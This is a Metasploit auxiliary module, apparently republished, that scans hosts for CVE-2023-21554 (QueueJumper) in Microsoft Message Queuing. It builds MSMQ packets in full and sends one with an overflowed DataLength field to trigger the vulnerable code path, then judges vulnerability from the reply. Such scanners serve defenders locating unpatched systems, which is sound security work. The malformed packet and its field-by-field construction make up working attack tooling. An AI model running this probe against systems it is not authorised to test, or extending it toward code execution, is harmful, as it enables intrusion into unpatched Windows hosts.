CVE-2023-21554 QueueJumper - MSMQ Remote Code Execution Check

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'bindata'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'CVE-2023-21554 - QueueJumper - MSMQ RCE Check',  
'Description' => %q{  
This module checks the provided hosts for the CVE-2023-21554 vulnerability by sending  
a MSMQ message with an altered DataLength field within the SRMPEnvelopeHeader that  
overflows the given buffer. On patched systems, the error is caught and no response  
is sent back. On vulnerable systems, the integer wraps around and depending on the length  
could cause an out-of-bounds write. In the context of this module a response is sent back,  
which indicates that the system is vulnerable.  
},  
'Author' => [  
'Wayne Low', # Vulnerability discovery  
'Haifei Li', # Vulnerability discovery  
'Bastian Kanbach <[email protected]>' # Metasploit Module, @__bka__  
],  
'References' => [  
[ 'CVE', '2023-21554' ],  
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554' ],  
[ 'URL', 'https://securityintelligence.com/posts/msmq-queuejumper-rce-vulnerability-technical-analysis/' ]  
],  
'DisclosureDate' => '2023-04-11',  
'License' => MSF_LICENSE,  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'SideEffects' => [IOC_IN_LOGS],  
'Reliability' => [REPEATABLE_SESSION],  
'AKA' => ['QueueJumper']  
}  
)  
)  
register_options([  
Opt::RPORT(1801)  
])  
end  
  
# Preparing message struct according to https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/f9e71595-339a-4cc4-8341-371e0a4cb232  
  
class BaseHeader < BinData::Record  
# BaseHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/058cdeb4-7a3c-405b-989c-d32b9d6bddae)  
#  
# Simple header containing a static signature, packet size, some flags and some sort of timeout value for the message to arrive  
#  
  
endian :big  
  
uint8 :version_number  
uint8 :reserved  
uint16 :flags  
uint32 :signature  
uint32le :packet_size  
uint32le :time_to_reach_queue  
end  
  
class UserHeader < BinData::Record  
# UserHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/056b43bc-2466-4342-8504-1630310d5965)  
#  
# The UserHeader is an essential header that defines the destination, message id,  
# source, sent time and expiration time  
#  
  
endian :big  
  
string :source_queue_manager, length: 16  
string :queue_manager_address, length: 16  
uint32le :time_to_be_received  
uint32le :sent_time  
uint32le :message_id  
uint32 :flags  
uint16le :destination_queue_length  
string :destination_queue  
string :padding  
end  
  
class MessagePropertiesHeader < BinData::Record  
# MessagePropertiesHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/b219bdf4-1bf6-4688-94d8-25fdba45e5ec)  
#  
# This header contains meta information about the message like its label,  
# message size and whether encryption is used.  
#  
  
endian :big  
  
uint8 :flags  
uint8 :label_length  
uint16 :message_class  
string :correlation_id, length: 20  
uint32 :body_type  
uint32 :application_tag  
uint32 :message_size  
uint32 :allocation_body_size  
uint32 :privacy_level  
uint32 :hash_algorithm  
uint32 :encryption_algorithm  
uint32 :extension_size  
string :label  
end  
  
class SRMPEnvelopeHeader < BinData::Record  
# SRMPEnvelopeHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/062b8317-2ade-4b1c-804d-1674b2fdcad3)  
#  
# This header contains information about the SOAP envelope of the message.  
# It includes information about destination queue, label, message and sent  
# or expiration dates.  
# The Data field contains a SRMP Message Structure (https://learn.microsoft.com/en-us/openspecs/windows_protocols/mc-mqsrm/38cfc717-c703-46aa-a145-34f60b79399b)  
#  
  
endian :big  
  
uint16 :header_id  
uint16 :reserved  
uint32le :data_length  
string :data  
string :padding  
end  
  
class CompoundMessageHeader < BinData::Record  
# CompoundMessageHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/ecf70c09-d312-4afc-9e2c-f61a5c827f47)  
#  
# This header contains information about the SRMP compound message.  
# This is basically a HTTP message containing HTTP headers and a SOAP  
# body that defines parameters like the message destination, sent date,  
# label and some more.  
#  
  
endian :big  
  
uint16le :header_id  
uint16 :reserved  
uint32le :http_body_size  
uint32le :msg_body_size  
uint32le :msg_body_offset  
string :data  
end  
  
class ExtensionHeader < BinData::Record  
# ExtensionHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/baf230bf-7f15-4d03-bd1d-f8276608a955)  
#  
# Header detailing if any further headers are present. In this case  
# no further headers were appended.  
#  
  
endian :big  
  
uint32le :header_size  
uint32le :remaining_headers_size  
uint8 :flags  
string :reserved, length: 3  
end  
  
def send_message(msg)  
connect  
sock.put(msg)  
response = sock.timed_read(1024)  
disconnect  
return response  
end  
  
def run_host(ip)  
base_header = BaseHeader.new  
  
# Version number is always 0x10  
base_header.version_number = 16  
  
base_header.reserved = 0  
  
# Flags: PR=3 (Message Priority)  
base_header.flags = 768  
  
# Signature is static and always set to 'LIOR'  
base_header.signature = 0x4C494F52  
  
# TimeToReachQueue set to 'infinite' (0xFFFFFFFF)  
base_header.time_to_reach_queue = 4294967295  
  
user_header = UserHeader.new  
  
# SourceQueueManager is set to a null UUID, since SRMP Messages use the SOAP Headers for this  
user_header.source_queue_manager = "\x00" * 16  
  
# QueueManagerAddress is set to a null UUID, since SRMP Messages use the SOAP Headers for this  
user_header.queue_manager_address = "\x00" * 16  
  
user_header.time_to_be_received = 0  
  
# SentTime is set to an arbitrary value. For this purpose it doesn't matter if it's in the past  
user_header.sent_time = 1690217059  
  
user_header.message_id = 1  
  
# Flags: RC=1, DQ=7 (Direct Format Type), F=1 (MessagePropertiesHeader present), J=1 (HTTP used)  
user_header.flags = 18620418  
  
# An arbitrary ip address and queue name was chosen to send the message.  
# Usually this need to match an existing IP address and queue name, however  
# for this Proof-of-Concept it doesn't matter what values are used.  
user_header.destination_queue = "http://192.168.10.100/msmq/private$/queuejumper\x00".encode('utf-16le')  
  
user_header.destination_queue_length = user_header.destination_queue.length  
user_header.padding = ''  
user_header_padding_required = (4 - (user_header.to_binary_s.length % 4)) % 4  
user_header.padding = "\x00" * user_header_padding_required  
  
message_properties_header = MessagePropertiesHeader.new  
message_properties_header.flags = 0  
message_properties_header.message_class = 0  
message_properties_header.correlation_id = "\x00" * 20  
message_properties_header.body_type = 0  
message_properties_header.application_tag = 0  
  
# Usually this field contains the size of the message. In SRMP messages this is handles within the SOAP headers  
message_properties_header.message_size = 0  
  
message_properties_header.allocation_body_size = 0  
message_properties_header.privacy_level = 0  
message_properties_header.hash_algorithm = 0  
message_properties_header.encryption_algorithm = 0  
message_properties_header.extension_size = 0  
  
# Label of the message was set to the arbitrary value 'poc'  
message_properties_header.label = "poc\x00".encode('utf-16le')  
  
message_properties_header.label_length = message_properties_header.label.length / 2  
  
srmp_envelope_header = SRMPEnvelopeHeader.new  
srmp_envelope_header.header_id = 0  
srmp_envelope_header.reserved = 0  
  
# The payload within the SRMPEnvelopeHeader structure is a SOAP request that defines message label, destination queue  
# and expiry and sent dates.  
# Usually the destination information need to match the IP address and queue name, however  
# for this Proof-of-Concept it doesn't matter what values are used.  
srmp_envelope_header.data = <<~EOF.chomp  
<se:Envelope xmlns:se="http://schemas.xmlsoap.org/soap/envelope/" \r  
xmlns="http://schemas.xmlsoap.org/srmp/">\r  
<se:Header>\r  
<path xmlns="http://schemas.xmlsoap.org/rp/" se:mustUnderstand="1">\r  
<action>MSMQ:poc</action>\r  
<to>http://192.168.10.100/msmq/private$/queuejumper</to>\r  
<id>uuid:1@00000000-0000-0000-0000-000000000000</id>\r  
</path>\r  
<properties se:mustUnderstand="1">\r  
<expiresAt>20600609T164419</expiresAt>\r  
<sentAt>20230724T164419</sentAt>\r  
</properties>\r  
</se:Header>\r  
<se:Body></se:Body>\r  
</se:Envelope>\r\n\r\n\x00  
EOF  
  
srmp_envelope_header.data = srmp_envelope_header.data.encode('utf-16le')  
srmp_envelope_header.data_length = srmp_envelope_header.data.length / 2  
srmp_envelope_header_padding_required = (4 - (srmp_envelope_header.to_binary_s.length % 4)) % 4  
srmp_envelope_header.padding = "\x00" * srmp_envelope_header_padding_required  
  
compound_message_header = CompoundMessageHeader.new  
  
# HeaderId is set to an arbitrary value  
compound_message_header.header_id = 500  
  
compound_message_header.reserved = 0  
  
# MsgBodySize denotes the size of the actual message  
compound_message_header.msg_body_size = 7  
  
# MsgBodyOffset is the offset of the actual message within the CompoundMessageHeader payload  
compound_message_header.msg_body_offset = 995  
  
# The data field within the CompoundMessageHeader structure contains a HTTP-POST request that is used to submit the message  
# to MSMQ. It contains the destination host, the SOAP envelope from SRMPEnvelopeHeader, sent and expiry dates. The destination  
# addresses and queue names don't need to match for this proof-of-concept to work. With incorrect information the message will  
# never reach the destination, however parsing of the structure and triggering the vulnerable code sequence happens before anyway.  
compound_message_header.data = <<~EOF.chomp  
POST /msmq HTTP/1.1\r  
Content-Length: 816\r  
Content-Type: multipart/related; boundary="MSMQ - SOAP boundary, 53287"; type=text/xml\r  
Host: 192.168.10.100\r  
SOAPAction: "MSMQMessage"\r  
Proxy-Accept: NonInteractiveClient\r  
\r  
--MSMQ - SOAP boundary, 53287\r  
Content-Type: text/xml; charset=UTF-8\r  
Content-Length: 606\r  
\r  
<se:Envelope xmlns:se="http://schemas.xmlsoap.org/soap/envelope/" \r  
xmlns="http://schemas.xmlsoap.org/srmp/">\r  
<se:Header>\r  
<path xmlns="http://schemas.xmlsoap.org/rp/" se:mustUnderstand="1">\r  
<action>MSMQ:poc</action>\r  
<to>http://192.168.10.100/msmq/private$/queuejumper</to>\r  
<id>uuid:1@00000000-0000-0000-0000-000000000000</id>\r  
</path>\r  
<properties se:mustUnderstand="1">\r  
<expiresAt>20600609T164419</expiresAt>\r  
<sentAt>20230724T164419</sentAt>\r  
</properties>\r  
</se:Header>\r  
<se:Body></se:Body>\r  
</se:Envelope>\r  
\r  
--MSMQ - SOAP boundary, 53287\r  
Content-Type: application/octet-stream\r  
Content-Length: 7\r  
Content-Id: body@ff3af301-3196-497a-a918-72147c871a13\r  
\r  
Message\r  
--MSMQ - SOAP boundary, 53287--\x00  
EOF  
compound_message_header.http_body_size = compound_message_header.data.length  
  
extension_header = ExtensionHeader.new  
  
# Extension header will be empty in this case. The length is set to the minimal value of 12.  
extension_header.header_size = 12  
  
extension_header.remaining_headers_size = 0  
extension_header.flags = 0  
extension_header.reserved = "\x00" * 3  
  
# Total packet size within the BaseHeader is calculated, now that all message parts were instantiated  
base_header.packet_size = base_header.to_binary_s.length + user_header.to_binary_s.length + message_properties_header.to_binary_s.length + srmp_envelope_header.to_binary_s.length + compound_message_header.to_binary_s.length + extension_header.to_binary_s.length  
  
# A normal message is sent to the server. This should yield a result for both, vulnerable and patched MSMQ instances  
response = send_message(base_header.to_binary_s + user_header.to_binary_s + message_properties_header.to_binary_s + srmp_envelope_header.to_binary_s + compound_message_header.to_binary_s + extension_header.to_binary_s)  
  
if !response  
print_error('No response received due to a timeout')  
return  
end  
  
if response.include?('LIOR')  
# Response from server contains the static signature value 'LIOR'. Presence of MSMQ is confirmed  
print_status('MSMQ detected. Checking for CVE-2023-21554')  
else  
print_error('Service does not look like MSMQ')  
return  
end  
  
# This statement increases the DataLength field within the SRMPEnvelopeHeader by 0x80000000. This will cause  
# an integer overflow, that overflows the 4 integer bytes. By adding this value the least significant 4 bytes will  
# remain the same, to ensure that a vulnerable MSMQ instance doesn't try to access invalid memory. This means that  
# vulnerable instances are expected to sent a normal response, like for the first, unmodified packet.  
#  
# Patched instances will detect the overflow, throw an exception and stop processing the message. No response is expected.  
srmp_envelope_header.data_length = srmp_envelope_header.data_length + 2147483648  
  
response = send_message(base_header.to_binary_s + user_header.to_binary_s + message_properties_header.to_binary_s + srmp_envelope_header.to_binary_s + compound_message_header.to_binary_s + extension_header.to_binary_s)  
  
if response.nil?  
print_error('No response received, MSMQ seems to be patched')  
return  
end  
  
if response.include?('LIOR')  
print_good('MSMQ vulnerable to CVE-2023-21554 - QueueJumper!')  
  
# Add Report  
report_vuln(  
host: ip,  
port: rport,  
proto: 'tcp',  
name: name,  
info: 'Missing Microsoft Windows patch for CVE-2023-21554',  
refs: references  
)  
  
else  
print_error('Unknown response detected upon sending a malformed message. MSMQ might be vulnerable, but the behaviour is unusual')  
end  
rescue ::Rex::ConnectionError  
print_error('Unable to connect to the service')  
rescue ::Errno::ECONNRESET  
print_error('Connection reset by service')  
rescue ::Errno::EPIPE  
print_error('pipe error')  
rescue Timeout::Error  
print_error('Timeout after waiting for service to respond')  
rescue StandardError => e  
print_error(e)  
end  
end  
`